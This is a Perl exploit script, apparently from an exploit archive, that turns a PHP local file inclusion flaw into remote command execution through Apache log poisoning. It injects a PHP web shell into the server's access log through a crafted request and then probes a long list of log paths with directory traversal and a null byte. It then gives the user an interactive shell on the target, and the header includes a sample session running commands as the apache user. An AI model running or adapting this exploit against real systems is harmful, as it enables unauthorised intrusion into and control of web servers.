[LFI to RCE]

1. #!/usr/bin/perl
2.  
3. # From Local File Inclusion to Remote Command Execution via Apache logs poisoning Exploit
4. # Coded by Giovanni Buzzin, "Osirys"
5. # WebSite : www.y-osirys.com
6. # Contacts :
7. # me[at]y-osirys[dot]com
8. # osirys[at]autistici[dot]org
9.  
10. # ------------------------------------------------------------------
11. # Exploit in action [>!]
12. # ------------------------------------------------------------------
13. # Usage : perl filename full_website_plus_path vuln_file_plus_var
14. # ------------------------------------------------------------------
15. # osirys[~]>$ perl lfi_rce.txt http://localhost/test/ index.php?page=
16. #
17. # ---------------------------
18. # LFI to RCE Sploit
19. # (Log Inj)
20. # by Osirys
21. # ---------------------------
22. #
23. # [*] Injecting evil php code ..
24. # [*] Cheeking for Apache Logs ..
25. # [*] Apache Log Injection completed
26. # [*] Path: /var/log/httpd/access_log
27. # [!] Hi my master, do your job now [x]
28. #
29. # shell[localhost]$> id
30. # uid=80(apache) gid=80(apache) groups=80(apache)
31. # shell[localhost]$> pws
32. # bash: pws: command not found
33. # shell[localhost]$> pwd
34. # /home/osirys/web/test/
35. # shell[localhost]$> exit
36. # [-] Quitting ..
37. #
38. # osirys[~]>$
39. # ------------------------------------------------------------------
40.  
41.  
42. use IO::Socket::INET;
43. use LWP::UserAgent;
44.  
45. my $host = $ARGV[0];
46. my $lfi_path = $ARGV[1];
47. my $null_byte = "%00";
48. my $rand_a = int(rand 150);
49. my $rand1 = "1337".$rand_a."1337";
50. my $rand_b = int(rand 150);
51. my $rand2 = "1337".$rand_b."1337";
52. my $gotcha = 0;
53. my $dir_trasv = "../../../../../../../../../..";
54. my @logs_dirs = qw(
55. /var/log/httpd/access_log
56. /var/log/httpd/access.log
57. /var/log/httpd/error.log
58. /var/log/httpd/error_log
59. /var/log/access_log
60. /logs/error.log
61. /logs/access.log
62. /var/log/apache/error_log
63. /var/log/apache/error.log
64. /etc/httpd/logs/access_log
65. /usr/local/apache/logs/error_log
66. /etc/httpd/logs/access.log
67. /etc/httpd/logs/error_log
68. /etc/httpd/logs/error.log
69. /usr/local/apache/logs/access_log
70. /usr/local/apache/logs/access.log
71. /var/www/logs/access_log
72. /var/www/logs/access.log
73. /var/log/apache/access_log
74. /var/log/apache/access.log
75. /var/log/access_log
76. /var/www/logs/error_log
77. /var/www/logs/error.log
78. /usr/local/apache/logs/error.log
79. /var/log/error_log
80. /apache/logs/error.log
81. /apache/logs/access.log
82. );
83.  
84. my $php_code = "<?php if(get_magic_quotes_gpc()){ \$_GET[cmd]=st".
85. "ripslashes(\$_GET[cmd]);} system(\$_GET[cmd]);?>";
86.  
87. (($host)&&($lfi_path)) || help("-1");
88. cheek($host) == 1 || help("-2");
89. cheek($lfi_path) == 1 || help("-2");
90. &banner;
91.  
92. $datas = get_input($host);
93. $datas =~ /(.*) (.*)/;
94. ($h0st,$path) = ($1,$2);
95.  
96.  
97. $sock = IO::Socket::INET->new(
98. PeerAddr => $h0st,
99. PeerPort => 80,
100. Proto => "tcp"
101. ) || die "Can't connect to $host:80!\n";
102.  
103. print "[*] Injecting evil php code ..\n";
104.  
105. print $sock "GET /Osirys_log_inj start0".$rand1.$php_code."0end".$rand2." HTTP/1.1\r\n";
106. print $sock "Host: ".$host."\r\n";
107. print $sock "Connection: close\r\n\r\n";
108. close($sock);
109.  
110. print "[*] Cheeking for Apache Logs ..\n";
111.  
112. while (($log = <@logs_dirs>)&&($gotcha != 1)) {
113. $tmp_path = $host.$lfi_path.$dir_trasv.$log.$null_byte;
114. $re = get_req($tmp_path);
115. if ($re =~ /Osirys_log_inj/) {
116. $gotcha = 1;
117. $log_path = $tmp_path;
118. print "[*] Apache Log Injection completed\n";
119. print "[*] Path: $log\n";
120. print "[!] Hi my master, do your job now [x]\n\n";
121. &exec_cmd;
122. }
123. }
124.  
125. $gotcha == 1 || die "[-] Couldn't find Apache Logs\n";
126.  
127. sub exec_cmd {
128. $h0st !~ /www\./ || $h0st =~ s/www\.//;
129. print "shell[$h0st]\$> ";
130. $cmd = <STDIN>;
131. $cmd !~ /exit/ || die "[-] Quitting ..\n\n";
132. $exec_url = $log_path."&cmd=".$cmd;
133. my $re = get_req($exec_url);
134. my $content = tag($re);
135. if ($content =~ m/start0$rand1(.+)\*0end$rand2/g) {
136. my $out = $1;
137. $out =~ s/\$/ /g;
138. $out =~ s/\*/\n/g;
139. chomp($out);
140. print "$out\n";
141. &exec_cmd;
142. }
143. else {
144. $c++;
145. $cmd =~ s/\n//;
146. print "bash: ".$cmd.": command not found\n";
147. $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n";
148. &exec_cmd;
149. }
150. }
151.  
152. sub get_req() {
153. $link = $_[0];
154. my $req = HTTP::Request->new(GET => $link);
155. my $ua = LWP::UserAgent->new();
156. $ua->timeout(4);
157. my $response = $ua->request($req);
158. return $response->content;
159. }
160.  
161. sub cheek() {
162. my($k,$string) = ($_[0],$_[1]);
163. if ($k == 1) {
164. if ($string =~ /http:\/\/(.+)/) {
165. return 1;
166. }
167. else {
168. return 0;
169. }
170. }
171. elsif ($k == 2) {
172. if ($string =~ /(.+)\.(.+)\?(.+)=/) {
173. return 1;
174. }
175. else {
176. return 0;
177. }
178. }
179. }
180.  
181. sub get_input() {
182. my $host = $_[0];
183. $host =~ /http:\/\/(.*)/;
184. $s_host = $1;
185. $s_host =~ /([a-z.-]{1,30})\/(.*)/;
186. ($h0st,$path) = ($1,$2);
187. $path =~ s/(.*)/\/$1/;
188. $full_det = $h0st." ".$path;
189. return $full_det;
190. }
191.  
192. sub tag() {
193. my $string = $_[0];
194. $string =~ s/ /\$/g;
195. $string =~ s/\s/\*/g;
196. return($string);
197. }
198.  
199. sub banner {
200. print "\n".
201. " --------------------------- \n".
202. " LFI to RCE Sploit \n".
203. " (Log Inj) \n".
204. " by Osirys \n".
205. " --------------------------- \n\n";
206. }
207.  
208. sub help() {
209. my $error = $_[0];
210. if ($error == -1) {
211. &banner;
212. print "\n[-] Input data failed ! \n";
213. }
214. elsif ($error == -2) {
215. &banner;
216. print "\n[-] Bad hostname address !\n";
217. }
218. print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
219. exit(0);
220. }